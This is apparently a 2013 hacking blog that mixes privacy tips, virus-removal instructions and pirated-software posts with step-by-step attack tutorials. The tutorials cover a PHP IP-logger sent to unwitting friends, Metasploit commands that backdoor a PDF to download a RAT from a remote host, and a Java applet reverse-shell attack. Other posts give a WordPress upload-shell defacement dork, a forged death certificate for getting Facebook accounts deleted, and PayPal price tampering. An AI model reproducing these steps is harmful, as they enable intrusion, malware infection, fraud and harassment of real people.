Sunday, 27 January 2013

HOW TO GET IP ADDRESS OF ANYONE USING JUST A PHP SCRIPT


HELLO DAVIDREX BACK GOING TO TEACH YOU HOW TO GET IP ADRESS OF SOMENONE USING PHP ............ (SOOO SIMPLE)
AND THIS ALSO WORKING
# ONLY 3 STEPS

1) COPY THE CODE BELOW AND PASTE IT IN THE NOTEPAD(code must be the same) :


<?php
$ip = $_SERVER['REMOTE_ADDR'];
$open = fopen('logs.html' , 'a+');
$fwrite = fwrite($open , $ip.'<hr />');
$fclose = fclose($open);
header('Location: http://rexcybertrix.blogspot.com/');
?>

2) NOW SAVE THAT AS INDEX.PHP. 

3) THEN GO TO ANY FREEE WEBHOSTING SITE AND SIGNUP.

4) GO TO FILES > FILE MANAGER 1 > AND UPLOAD THE CODE(INDEX.PHP) THAT U SAVED EARLIER....

5) NOW SEND THAT DOMAIN THAT YOU REGISTER AND UPLOAD THE CODE TO YOUR FRIEND... IF HE CLICK THAT, AUTOMATICLLY U WILL GET THE IP ADRESS IN THE LOGS HTML.

#HAVE ANY PROBLEM FEEL FREE TO COMMENT AND ASK .... GOOD BAI 
VISIT OUR BLOG DAILY....

Saturday, 26 January 2013

System Speed Booster 2.9.7.6 Full Version Free

 

 



System Speed Booster offers the free scan and removal of system's obsolete registry entries and junk files, to protect your personal information and optimize the system to the best condition, with its multiple, solid features and sleek interface System Speed Booster is full of energy and capacity to provide the best computer utilities for customers, such as registry cleaner, system optimizer, disk checker and so on. System Speed Booster functions you multi tactics to speedup your system for each individual start-up and running. For a start, it will receive reduce PC personal PC brakes and drops the lifeless fat in apps, producing your clean running, browsing or enjoying. Secondly, it tune away from the rip-off solutions and procedures. to your program.Eventually, as a result of a wide-ranging other optimizations, your individual home PC is actually new subsequently after optimization.


Source :- Best4Hack

[TUT]Creating a penetration lab in windows

In last few posts i have tell u about the hacking windows using backtrack, but in all the posts i was not exploiting the real victims, i was just hacking my own OS installed on my system means i had created a penetration lab.

Whats a Penetration Lab consist of-->

1. Attacker OS(you may use backtrack,Backbox)
2. Victim OS(Win Xp or any other win)

Now i am gonna tell you how to create your own penetration lab by just following few steps.

Things you will need ---->

1. Virtual Box. Download it from here.
2. Bootable DVD of attacker or victim OS to installs OS's.
3. Brain.

Lets start------>

1. Install Virtual Box.

2. Now create two virtual machines name first as attacker and second as victim.Like i created in pic given below.


3. After creating both virtual machines install respective operating system in it. Like I am gonna install Backtrack as attacker OS and win xp as victim OS.

4. Now after installing all OS's the thing you have to do is creating network connection for both OS's for that you have to follow a simple procedure.

5. Right Click on any virtual machine from list and click settings and click on Network tab in left side and you will get network tab like I get in image.


6. As you see in image in Adaptor 1 tab Attached to is selected to NAT. Just change it to Host-Only Adaptor and click Ok like i do in image given below.

7. Do same as in step 6 for second OS.

Now you may start doing your exploitation work.

Note-->
Must keep same settings that i kept in step 6.

Plz comment if feel any query about this tutorial.

AWESOME GOOGLE DODLES / TRICKS PART 1




1) GOOGLE GRAVITY:
GO TO WWW.GOOGLE.COM , ENTER "GOOGLE GRAVITY" IN THE SEARCH BAR. HIT "I'M FEELING LUCKY"...NOW SEE WHAT HAPPENS

2) TILT OR ASKEW
GO TO WWW.GOOGLE.COM THEN TYPE TILT AND CLICK ENTER
3) MENTALPLEX
IM SURE THAT THIS TRICK WILL MAKE YOUR MIND CRAZY
4) GOOGLE PACMAN
WOW THIS IS MY FAVOURITE GOOGLE DOODLE 
AWES0ME !!!!




Friday, 25 January 2013

Hack WordPress With Comment Upload Plugin



Hey hiii guys Welcome to Best4Hack and today i m going to share a trick from which you able to hack WordPress With Comment Upload Plugin Technique and this is very east Technique and more than 10000+ website are variable form this OK so let get start

Step 1 

Open Google Search and type the given below dork.

Google Dork
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php 

Index of /wp-content/plugins/easy-comment-uploads

Step 2

Select any website from the search result The exploit URL will be like this  
http://anysite.com/wp-content/plugins/easy-comment-uploads/upload-form.php
Now upload your Deface Page like .TEX file or in Image format and in some you can also upload your shell in image format like shell.asp;.jpg
To check your uploaded Defect Page add "/wp-content/uploads/2013/01/your file name" in front of hacked URL without " " like http://anysite.com/wp-content/uploads/2013/01/your file name you can change the date as per your upload like you upload your file on 2-3-2013 then just change URL like this http://anysite.com/wp-content/uploads/2013/03/your file name to see your defected page

Thank you  for visiting on our site and reading our post......

WARNING :-
 THIS POST IS ONLY FOR EDUCATIONAL PURPOSE ONLY I M AND MY SITE NOT RESPONSIBLE FOR ANY MISS USE OF THIS POST IN ANY WRONG WAY


SOURCE ----> Best4Hack

BLOG CONTEST MALAYSIA 2013

HOW TO SEE YOUR FACEBOOK FRIENDS EMAIL


HELLO ALL ITS ME DAVIDREX . TODAY IM GONE TEACH YOU HOW TO SEE THE EMAIL ADDRESS OF YOUR FRIENDZ WHEN IT HAS BEEN LOCKED.
USING JUST A FEW STEPS.................

GENERALLY THIS METHOD IS USED FOR HACKING FACEBOK ACCOUNT.
BECAUSE MOST OF THE FACEBOOK USERS STARTS TO HIDDEN THEIR FACEBOOK EMAIL TO AVOID HACKING THEIR ACCOUNT.
1)GO HERE --------------> YAHOO
2) IT WILL LOOK LIKE THIS
3) CLICK THE FACEBOOK ICON AFTER YOU ENTER YOUR EMAIL AND PASSWORD.
4)THEN IT WILL LOOK LIKE THIS
5) NOW CLICK THE FACEBOOK ICON
6) AFTER THAT IT WILL LOOK LIKE BELOW
7) NOW CLICK OK
8) THEN THIS WILL APPEAR
9) ITS FINISH..
10) THE EMAIL WILL APPEAR ON THE SCREEN IN YOUR LEFT SIDE
TQ
IF YOU MISSED JUST COMMENT BELOW.........................

Thursday, 24 January 2013

[Video]Hacking a win 7 using SET

Many of my friends were asking for the ways to hack a computer. After all the requests I made a video for all my friends and other cyber users.

What this video is about--->

In this video i will show you how to hack windows 7 using browser autopawn exploit of internet explorer.
This method works in all windows.

Things you will need ---->

1. Backtrack OS.
2. Victim. (use virtual machines)
3. Brain

So here is the video given below.
Watch it and do exactly what i do in video.
Comment, Share ,Like

Tuesday, 22 January 2013

[TUT]Backdooring a pdf ebook with metasploit

Hey friends this is D@rk TruTH. As we all use RAT, Botnets but the things went wrong when our rats and bots get detected by antiviruses. But today i am gonna show you how to backdoor a pdf ebook. 
Yes a pdf ebook.

Concept behind this--->

Victim will open our pdf file but in background it will download our rat and bot silently and will infect the victim.  

Things you need----->

1. A pdf book (use any book)
2. Metasploit(use backtrack OS)
3. Your Rat or bot hosted at any file sharing site(Make sure you use direct link like www.filesharing.com/server.exe)

Now Lets start this---->

1. Open up Metasploit console

2. Type this in the console:use exploit/windows/fileformat/adobe_pdf_embedded_exe

3. Type this in the console:
set payload windows/download_exec


4. Type this in console:set INFILENAME <location of your pdf to infect here>
EXAMPLE: set INFILENAME /root/mypdf.pdf

5. Type this in console:
set url <direct download link to your fud server>
EXAMPLE: set url http://download.com/server.exe

6. Type this in console:Exploit

Now you will get infected pdf in root folder just send ur pdf file to victim and when he open the pdf file he/she will able to read pdf but in background pdf file will download our rat and bot in victim computer.

Note:
1. Use direct link for your rat.
2. Use a good pdf file so as victim try to open it.

ALEX PANDIAN MOVIE 2013 WATCH ONLINE FREE

HELLO EVERYONE DAVIDREX IS BACK
FROM TODAY ONWARD OUR BLOG IS GOING TO INTRODUCE A NICE TOPIC.
WATCH NEW TAMIL MOVIE FOR FREE

NOW LETS START THIS HAPPY NEWS WITH A NICE MOVIE ....

ALEX PANDIAN


RELEASE DATE: 11 JAN 2013
GENRE: ACTION - COMEDY
LANGUAGE: TAMIL
CERTIFICATION: U
DIRECTOR: SURAJ
PRODUCER: K.E.GNANAVELRAJA
CAST: KARTHIK SIVAKUMAR AS ALEX PANDIAN
ANUSHKA SHETTY
MORE: ALEX PANDIYAN CAST & CREW
STORY:
ALEX PANDIAN IS AN ACTION-COMEDY FILM DIRECTED BY SURAJ, FEATURES KARTHI AND ANUSHKA SHETTY IN THE LEAD ROLES, AND SANTHANAM COMPLETE ALEX PANDIYAN STORY...

AS IT TAKE'S LONG TIME TO UPLOAD THE MOVIE IN BLOG .
SO I DECIDED TO POST THE LINK OF THE MOVIE THAT I LOADED IN OTHER VIDEO HOSTING SITE

1) NOW VIDEO ALEX PANDIAN 2013

2) ALL ONLINE MOVIE UPLOAD


Sunday, 20 January 2013

Hacking windows 7 using metasploit

Hey friends this D@rk TruTH. Today i am gonna show how to exploit windows xp and 7 using metasploit. Lets Start...

Things you will need ---->

1. Backtrack OS or Metsaploit.
2. A victim
3. Brain(important thing lol)

Lets start the shit ---->

1. Open terminal, type msfconsole and hit enter. Metsaploit will open like in image.

2. Now type use exploit/multi/browser/java_signed_applet and hit enter.

3. Type set payload windows/meterpreter/reverse_tcp and hit enter.

4. Type set lhost 223.185.18.74 (must change 223.185.18.74 with your ip address)

5. Now type set lport 443 and hit enter.

6. Now type set srvport 80 and hit enter.

7. Now type set uripath cybersucks and hit enter.(you may change cybersucks to your disired one)

8. At last type exploit and hit enter. See image below

9. Now send http://youripaddress:80/cybersucks to your victim.

10. Now when victim will open it he/she will be hacked.

11. Now see hacked sessions by typing sessions -l 


Friday, 18 January 2013

DELETE ANY FACEBOOK WITHIN 24 HOURS



DAVID REX IS HERE
JUST FOLLOW THE STEPS:
STEP 1 - GO TO THIS URL:
https://www.facebook.com/help/contact/?id=305593649477238

SO THIS IS THE URL WE WILL USE TO REPORT OUR SLAVE. THIS FORM ALLOWS YOU TO REPORT A DECEASED PERSON (SOMEONE WHO IS DEAD).

STEP 2 - COMPLETE THE FIELDS:

EXPLAIN:
FULL NAME: YOUR VICTIMS FULL NAME(NAME LAST NAME)
DATE OF BIRTH: GO AT HIS PROFILE AND CLICK AT INFO TAB AND GET HIS DATE OF BIRTH.
ACCOUNT EMAIL ADDRESSES: DO THE SAME THING, GO TO HIS PROFILE AND CLICK ON INFO TAB AND GET HIS EMAIL ADDRESSES.
NETWORKS: AGAIN,GO TO HIS PROFILE AND CLICK ON INFO TAB AND GET HIS NETWORKS, COPY THEM AND PASTE IN THE FORM.
WEB ADDRESS OF PROFILE YOU WOULD LIKE TO REPORT: JUST GO TO HIS PROFILE AND COPY THE LINK IN THE ADDRESS BAR.
RELATIONSHIP TO THIS PERSON: TO MAKE MORE BELIEVABLE SELECT IMMEDIATE FAMILY.
REQUESTED ACTION: REMOVE PROFILE
PROOF OF DEATH: THIS IS THE HARDEST PART OF THIS FORM. NOW TO MAKE A PROOF OF A DEATH JUST GOOGLE IN YOUR LANGUAGE A "DEATH CERTIFICATE" OR "CERTIFICATE OF A DEATH". IT DOESN'T MATTERS FROM WHAT COUNTRY YOU ARE, JUST USE THIS ITALIAN CERTIFICATE AND OPEN UP PHOTOSHOP OR WHATEVER IMAGE
EDITOR AND JUST WRITE IN A BLANK FIELD:
ANNUNCIAMO IL MORTE DI [NAME GOES HERE]. SAVE YOUR IMAGE TO DESKTOP AND UPLOAD IT IN ONE OF THE IMAGE
FREE HOSTING LIKE: http://postimage.org/
AND IT'S DONE ... ITALIAN DEATH CERTIFICATE:
ADDITIONAL INFORMATION: WRITE WHAT YOU WANT, JUST WRITE THAT YOU ARE IN HIS/HER FAMILY AND YOU WOULD LIKE TO CLOSE HIS/HER FACEBOOK ACCOUNT BECAUSE YOU WON'T LIKE THAT WHEN HE IS DEAD, HIS FACEBOOK IS OPENED.

STEP 3 - CLICK ON SUBMIT AND THEN A MESSAGE WILL APPEAR:
YOUR INJURY WAS SUBMITTED AT FACEBOOK TEAM .. SO THE MEANING IS THAT ONE OF THE MOD'S OF FACEBOOK WILL REVIEW YOUR REPORT AND WILL DO THE RIGHT DECISION. IT WORKS IN MOST OF THE TIMES. I CLOSED A FEW ONES.

Uniblue DriverScanner v4.0.10.0 2013 Full Version

 




Hiiii guys welcome to Best4Hack and today i m going to share "Uniblue DriverScanner v4.0.10.0 2013" Full Version. Updating drivers is not just an important part of PC maintenance but also a first line treatment for hardware problems and a reliable way of increasing your computer's stability and performance. Produced by device manufacturers, drivers are essential for Windows to communicate with computer hardware. While first generation drivers can be unrefined and problem ridden, device manufacturers often release driver updates to improve device function and remove bugs and errors. Thus, the more recent the driver, the better your device will run and your computer perform.

Features

» Keep you hardware up to date with the very latest drivers
» Download drivers quickly and reliably from one centralized location
» Keep restore-points with each driver update for maximum safety
» Install each new driver quickly and with ease
» Enjoy an elegant but simple to use interface
» Update drivers for 32 or 64-bit systems running Windows XP, Windows Vista or Windows 7/8



Thursday, 17 January 2013

Windows XP SP2 Genuine Bootable ISO - 32 Bit - Free Download - Highly Compress



Hey hii guys welcome to Best4hack and today i m going to share Windows XP SP2 Genuine Bootable ISO - 32 Bit Highly Compress in 2 MB After Unzip it will become 646 MB hope you will enjoy this download

Sunday, 13 January 2013

Removing Khatra.exe virus from computer


Khatra.exe is a W32 trojan which is the most annoying virus i had ever seen. It appears as khatra.exe, ghost.exe or Xplorer.exe. This virus disable the Task manager and Registry Editor permanently. I was struggling with this idiot for a few days. This virus copies  itelf to removable media and spreads to other computers. I searched Internet a lot for removing this and finally i removed it completly from my pc. So, here I'm sharing the instructions for removing the virus below.

Is my PC infected??

 This is the first question you will ask. So, if you want to check whether you are affected by khatra.exe, ghost.exe or xplorer.exe virus, do as follows
Open task manager (if you have task manager disabled, this may be most probably because of virus attack. Anyway, to check whether you are affected by khatra virus or any other virus, just follow the first step in the removal instructions below to enable task manager first.)
Now go to process tab and check whether there is khatra.exe, gHost.exe or xplorer.exe (not explorer.exe)
If you see any of the process mentioned above, you can make it sure that your pc is affected by khatra.exe. (khatra in hindi language means danger. Strange virus!). If you dont see any of the above process, you cannot say that your pc is completely free from viruses. Sometimes you may be affected by some other viruses. One of the main symptoms of virus attack are disabling task manager, slowing down of pc and disabling of antivirus (of course, some viruses will disable your antivirus too!). This virus had another interesting property that when you search for "how to remove khatra virus" of similar things from the affected pc on a browser, your browser will automatically close! (i like it!). So, if your pc is infected, follow the steps below,


Steps:
1) To Enable Task manager,
Go To Start> Run

 Enter gpedit.msc in the Open box and click OK
  In the Group Policy settings window,
 Select User Configuration > Select Administrative Templates> Select System > Select Ctrl+Alt+Delete options> Select Remove Task Manager> Double-click the Remove Task Manager option. Now your Task manager is Enabled.

2) If Gpedit is disabled and regedit is enabled, do the following steps to regain task manager
Click Start -> Run. Type in "regedit" (no quotes) and hit Enter.

Search for HKEY_CURRENT_USER -> Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System.

 Look for: DisableTaskMgr. Click on REG_DWORD. Change value to 0

3)Click Ctrl+Alt+Del to launch task manager
Now remove all processes such as Khatra.exegHost.exe and Xplorer.exe (it is better to select all, right click and click end process tree). Be careful that dont remove explorer.exe in confuse with xplorer.exe. explorer.exe is an essential process for windows explorer.

4. Now download and install Everything search tool or similar tools
This is because you need to search and remove all copies of khatra.exe ,ghost.exe and xplorer.exevirus copies from your hard drive. For that you will need a search tool and your in built search tool will be disabled by the virus.
5. Remove all the copies of virus
Launch the app you downloaded. Search for khatra.exeghost.exe,Xplorer.exe and remove all one by one.
you can also download any other tools similar to everything search. Usually this will take some time. Don't forget to search in hidden folders and system folders. There shouldnot be any copy left in your harddisk.

6. Disable registry entries
Open registry editor (go to start>run, type regedit and enter)
Search for all keys with values khatra, gHost or xplorer and remove all entries.

Done! Now restart PC and it is better to create a new restore point and remove all older restore points from your PC. Now your pc is free from khatra.exe virus.

Friday, 11 January 2013

Get any PC game on Steam for FREE!

This tutorial will show you how to crack steam to get any PC game for FREE!.

Requirements:

  • Steam with a valid account.


How-to:

  • Download Green Luma rar file and extract it into your steam directory.
  • Now launch Green Luma.exe and go to your library for a surprise!
  • You'll be able to download many games for free, but not all
  • Many of them will show an error (no licenses.)
  • That's because you don't have the GCF / NCF files required to download that game.
  • To download the GCF / NCF files of any game, Go HERE.
  • Search for your game on that website and download the required files and copy it in your steamapps directory.
  • And try to download the game again via Steam.


Resources:

Enjoy!

Wednesday, 9 January 2013

WAppEx the Web Aplication exploiter....



WAppEx is an integrated platform for performing penetration testing and exploiting of web applications on Windows or Linux. It can automatically check for all type of security vulnerabilities in the given target and then let you to run various payloads to exploit and take advantages of the vulnerability.








WAppEx is a multi platform application and it is executable in Linux and Windows.

WAppEx's database which includes hundreds of exploits provides an automated, comprehensive and reliable exploit for penetration testers and security professionals worldwide.
Regular database update is available. Top priorities are high-risk and zero-day vulnerabilities.

Payloads for using in exploits are reliable payloads which contains connect-back, listener shell, arbitrary code execution, arbitrary file upload,...
WAppEx's script based engin let experienced users write their own scripts and payloads to test and exploit any vulnerability in web applications.
Software and vulnerability updates are available at any time and a daily support is available via phone or email.

WAppEx can exploit the following web application vulnerabilities:

SQL Injection:

The most dangerous vulnerability in web applications. WAppEx uses Havij - Advanced SQL Injection Tool engine to find and exploit this vulnerability.

Remote File Inclusion:

It allows an attacker to include a remote file. WAppEx can check for this vulnerability and run various payloads to execute commands on web server.

Local File Inclusion:

It allows an attacker to include a local file. Just like RFI WAppEx tests and exploits this vulnerability.

OS Commanding:

It let the attacker to execute OS commands on server. WAppEx tests and exploits this vulnerability to execute custom commands to get a reverse shell.

Script injection:

It can be used by an attacker to introduce (or "inject") script into a web application. WAppEx automatically tests and exploit this vulnerability to escalate access to web server and get a reverse shell.

Local File Disclosure:

as the name says it disclosure content of local files on the web server. WAppEx can exploit this vulnerability to read sensitive files on the server.

WAppEx

Windows 8 Pro Free Download-Direct Link-Original ISO (32/64 Bit)


Windows 8


Free Download Windows 8 original Untouched ISO from Direct Link. From Here You Can Download Windows 8 Free. In This Post I will Give You All original Version of Windows 8 Direct Download Link. So You Can Easily Choose Your Favourite Version of Windows 8 and Download with Resume Support. Windows 8 is Great Release of MicrosoftCorporation.


Windows 8 All Available Version:
1. Windows 8 Consumer Preview
2. Wndows 8 Developer Preview
3. Windows 8 Release Preview
4. Windows 8 Enterprise
5. Windows 8 Profreesional


Free Direct Download Windows 8
Developer: Microsoft Corporation
Language: English
Offcial Website


Windows 8 Release Preview
Download (32 Bit)
Download (64 Bit)


Windows 8 Enterprise
Download (32 Bit)
Download (64 Bit)

Windows 8 Professional
Download (32/64 Bit)

Password: www.oxava.com



Monday, 7 January 2013

PayPal Hack. [Get your stuff for $ 0.01!]

Requirements:

 How-to:

  • Enter fake information, but use valid paypal account and email address.
  • Once you are on the ordering page, slow down!
  • Don't click on the order button.
  • Go to tools ---> Tamper Data ---> Click on the 'Start Tamper' Button.
  • Now click on the order now button.
  • A pop-up will appear which will have 3 option ::: 1.Tamper   2.Submit   3.Cancel.
  • Click on Tamper.
  • A new window will appear.
  • Have a look at the right side of the window.
  • There shall be many values there.
  • Edit the Amount Value from the original to 0.01.
  • Click OK.
  • There shall be not just 1 pop-up but many so click on submit on all other pop-ups that appear later.
  • Now you will see the PayPal transaction page with the total bill value as just $ 0.01 !!!!



Disclaimer: I am not responsible at all if this thing doesn't work out.
















Sunday, 6 January 2013

10 THINGS NOT TO BE SHARED AT FACEBOOK



HELLO GUYZ AFTER LONG TIME NOT UPDATED BLOG NOW DAVIDREX HERE WITH HIS NEW TIPS !!!

1. DATE OF BIRTH.

REVEAL YOUR ACTUAL DATE OF BIRTH IS VERY RISKY WHEN FINANCIAL INSTITUTIONS REQUIRE THIS INFORMATION TO CREDIT CARD AND BANK STATEMENTS.

IN FACT, IT IS ALSO BRINGING YOU TO IDENTITY THEFT.

2. YOUR MOTHER'S MAIDEN NAME.

YOU HAVE TO REMEMBER THAT A LOT OF WEBSITES THAT USE MOTHER'S MAIDEN NAME AS A SECURITY QUESTION TO RECOVER PASSWORDS AND PERSONAL INFORMATION ABOUT YOU ON-LINE.

3. YOUR HOME ADDRESS.

NO NEED TO POST IT FEELS LIKE YOUR HOME ADDRESS TO THE PUBLIC BECAUSE CRIMINALS ARE NOW INCREASINGLY CUNNING TO FIND AN EMPTY HOUSE THROUGH ONLINE WHEN YOU 'UPDATE', "YEAY, LANGKAWI ISLAND, MALAYSIA HOLIDAYS."

4. TRAVEL AWAY FROM HOME.

WHO'S THAT TELL YOU AT HOME IN THE ABSENCE OF A LONG PERIOD DOES NOT ATTRACT THE ATTENTION OF NEIGHBORS TO MONITOR YOUR HOME, OTHERWISE ATTRACT THE 'OTHERS'.

5. LEAVING THE HOUSE IN A SHORT PERIOD.

IF YOU 'CHECK-IN' EITHER IN THE GYM OR IN THE SHOPPING CENTER ALSO PROVIDES THE POTENTIAL TO THIEVES TO BREAK INTO YOUR HOME.

6. INAPPROPRIATE PICTURES.

AGE OF HIGH TECHNOLOGY NOW ALLOWS ANYONE TO DOWNLOAD, SHARE AND EVEN MAKE IT AS A 'PEMUAS LUST'.

7. ADMISSION OR FRUSTRATION.

MANY EXPRESSED FEELINGS LIKE ANGER OR HATRED TOWARDS SOMEONE, ESPECIALLY WHEN IT COMES TO EMPLOYERS AND EMPLOYEES. DO NOT 'FLY' IF YOUR EMPLOYER HAS A PROBLEM IN THE OFFICE BECAUSE THERE WATCHING EYES AND MOUTH ARE REPORTED.

8. TELEPHONE NUMBER.

PHONE NUMBER THROUGH SOCIAL SITES IS NOT APPROPRIATE BECAUSE YOU HAVE THE POTENTIAL TO RECEIVE A CALL FROM A SALESPERSON (TELEMARKETERS), 'STALKERS' AND FRIEND TO FRIEND.

9. COUNTDOWN TO YOUR HOLIDAY.

YOU BETTER TELL YOUR FRIENDS ON VACATION AFTER RETURNING FROM A HOLIDAY FROM YOUR HOLIDAY MOMENTS SHARED ARRANGEMENT BEFORE GOING ON VACATION.

10. PICTURES IN THE HOUSE.

YOU HAVE A NEW LCD TELEVISION? HOME IN COMPLETE WITH VALUABLES? NEW HUSBAND BOUGHT POTS OF GOLD FROM DUBAI? ALL OF THAT WOULD MAKE THE 'JEALOUS' WILL GROW JEALOUS AND OPPORTUNITY FOR THE THIEF INVADING YOUR HOME ARE VERY HIGH.

THATS ALL FOR NOW

Saturday, 5 January 2013

Top 5 hacking apps for android


Today i am gonna tell you about the top 5 android app for hacking. As we all know hacking and pen testing is only can be done on computers. But now the world is changes now your mobile is small hacking toolkit using these apps. Must try all these apps.

The Android Network Toolkit

In the last Defcon conference a new tool has been released by a security researcher and the tool is called “The Android network toolkit”. The has been developed for penetration tester and ethical hackers to test any network and vulnerabilities by using their mobile phones. This toolkit contain different apps that will help any hacker to find vulnerabilities and possibly exploit it. The company behind the app is an Israeli security firm called Zimperium.

 

Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.

FaceNiff- Session Hijacker for Android

Your Facebook account is at risk, just like a Firesheep (for firefox hacking) there is a FaceNiff for hijacking the session of famous social networking websites includes facebook and twitter. FaceNiff is developed by Bartosz Ponurkiewicz who created Firesheep before but faceniff is for android OS.

AnDOSid- DOS Tool for Android

DOS or denial of service attack is very dangerous attack because it takes down the server 
(computer).AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.AnDOSid is designed for security professionals only!

SSHDroid- Android Secure Shell

Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android.
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").